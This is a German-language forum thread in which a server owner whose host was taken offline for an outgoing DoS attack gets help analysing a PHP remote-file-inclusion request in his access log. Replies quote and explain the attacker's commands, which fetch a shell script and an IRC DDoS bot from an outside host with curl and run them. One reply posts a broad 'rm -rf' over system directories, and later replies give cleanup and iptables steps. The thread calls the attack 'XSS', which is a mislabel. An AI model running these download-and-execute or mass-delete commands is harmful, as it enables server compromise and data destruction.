Server gesperrt / DOS-Attacke

[micha68]

Hallo!

Starto hat meinen Server wegen angeblicher ausgehender DOS-Attacke
vom Netz genommen.
Wo kann ich sehen, ob wirklich was von meinem Server ausging?

Gruss,
Micha

[Joe User]

In den nicht mehr vertrauenswürdigen Logs...

*moved*

[micha68]

Eine spezielle? Habe in den Standard-Logs nichts gefunden.

[micha68]

Könnte das mein Problem sein (gefunden in access_log)

GET /index.php?seite=http://www.julianosouda.oi.com.br/newcm ... r%20aff.sh

[lord_pinhead]

Glückwunsch, das sieht nach einer schönen XSS Attacke aus. Lass den Server neu aufsetzen, aber sicher vorher noch deine Logfiles und andere Daten. Die was du jetzt schonmal gefunden hast hat doch eine IP oder? Ich glaub zwar das es ein Brasilianer ist und das alles eh kein Sinn hat, aber sowas meldet man am besten mal wieder an Cert

Zu dem Aufruf:
%20 sind leerzeichen und Befehle mit ; getrennt:

Code: Select all

/index.php?seite=http://www.julianosouda.oi.com.br/newcmd.txt?&cmd=

Hier ruft der eine newcmd.txt auf, das eine Mischung aus HTML, PHP und C 
ist und anscheinend einen Rootkit installiert durch deinen PHP Parser. 
Was sagt dir ein Nmap Scan von ausserhalb? 
Aso, hast du etwa mal wieder f_url_open aktiviert in der php.ini?
#-----------------------------------------------------------------------------
cd /tmp;

Wechselt nach /tmp . Schonmal dran gedacht ein extre Session Directory 
im Vhost einzutragen? Wäre das auf jeden Fall nicht gegangen.
#-----------------------------------------------------------------------------
curl http://www.julianosouda.oi.com.br/aff.sh -O /tmp/aff.sh;

Holt mit dem Programm curl ganz cool das Script aff.sh von einen 
Brasilianischen Server. Näheres später.
#-----------------------------------------------------------------------------
Kurze Pause damit das Script laden kann, der Server ist relativ lahm, schlechter Ping.

sleep 3s;
#-----------------------------------------------------------------------------
Führt es mit einer Shell aus

sh /tmp/aff.sh;
#-----------------------------------------------------------------------------
Löscht es wieder

rm -fr aff.sh
#-----------------------------------------------------------------------------

Ok, schön gelöst mit einen Bot der ganze Bereich abklappert wie´s aussieht. Ok, weiter zum Script:

Code: Select all

#!/bin/sh
killall -9 perl;

cd /tmp;
curl http://www.julianosouda.oi.com.br/bot.c -O /tmp/bot.c;
perl bot.c;
rm -rf bot*;
rm -rf *.sh;

Ich sollte nicht erwähnen das jetzt in /tmp ein DDoS Bot schlummert der sich in ein IRC Netzwerk einhängt. Du kannst ja die bot.c einmal ankucken und dann mal in das Netzwerk reinkucken. Sieht mir irgendwie nach Portugisisch aus, weiß einer mehr?

Also, dein Rechner WAR ein DDoS Zombie und du solltest dir jetzt Gedanken machen wie du das in Zukkunft unterbinden kannst. Ich hoffe ich muss dir jetzt nicht auch noch den Rest sagen was das Perl Script macht oder?

Jetzt hast du erstmal lehrgeld kassiert und solltest jetzt mal iptables, IDS (Snort oder Prelude) und PHP Sicherheit ansehen. Vor allem mal hier im Forum den Thread suchen wo Links sind zu solchen Themen, sonst wirst du bald wieder Opfer und Täter für ein Sambatänzer.

Edit: hab gerade mal in den Channel gekuckt, da sind ca. 23 Bots drin, also kein Einzelfall.

MFG
Lord Pinhead

[micha68]

Hi!
Ich kann nun keine Neuinstallation auslösen, da Strato
den Rechner vom Netz genommen hat.
Die aktivieren den Zugang erst wieder, wenn ich Versichern kann,
die Ursache der DOS-Attacke entfernt zu haben.

Was muss ich tun, damit der gehackte Kram entfernt ist und
Strato das Ding wieder aktiviert?
Dateien/Ordner löschen wäre kein Problem, da der Rechner
dann komplett wieder aufgesetzt wird. :oops:

Danke,
Micha

[Joe User]

Code: Select all

rm -rf /{home,srv,usr/var,var,tmp}/*

[lord_pinhead]

@Joe OK, im ersten Moment übertrieben. Lässt sich für den Ã?bergang kürzer lösen.

Mach erstmal folgendes:

Code: Select all

Löschen von /tmp wegen den Bot, dem Rootkit und der Remoteshell (Pfad vorher nochmal Prüfen)
rm -rf /mnt/hda1/tmp/*

Dann Deaktiviere Usern aus der Passwd mit einen # davor die du für merkwürdig hälst.

danach lass die Kiste mal rebooten (der Dos ist jetzt nicht mehr möglich, die bot.c sollte weg sein :) ) und mach:

Code: Select all

iptables -t filter -A INPUT -i eth0 --protocol tcp --destination-port 20 --syn -j ACCEPT
iptables -t filter -A INPUT -i eth0 --protocol tcp --destination-port 22 --syn -j ACCEPT
iptables -t filter -A INPUT -i eth0 --protocol tcp --destination-port 1-65535 --syn -j REJECT --reject-with tcp-reset
iptables -t filter -A INPUT -i eth0 -s  217.160.252.232/24 -d <ip von dein server + Subnetzmaske> -j DROP
iptables -t filter -A OUTPUT -i eth0 -s  <ip von dein server + Subnetzmaske> -d 217.160.252.232/24 -j DROP

Das sollte dann nur die ssh und FTP freischalten und du kannst deine Daten sichern, die Remoteshell wird blockiert (die komischerweise auf Port 80 hört, dummer Zuckerhuthacker). Der IRC Server wird komplett geblockt, also wird es kein Verkehr von dein Server dahin geben (der Bot loggt sich ja auf den IRC Server ein) Danach den Server komplett löschen lassen, neu aufsetzen und vor allem wichtig ist das du jetzt dir hier ein paar Beiträge durchliest wegen Sicherheit damit das nicht nochmal passiert.

MFG
Lord Pinhead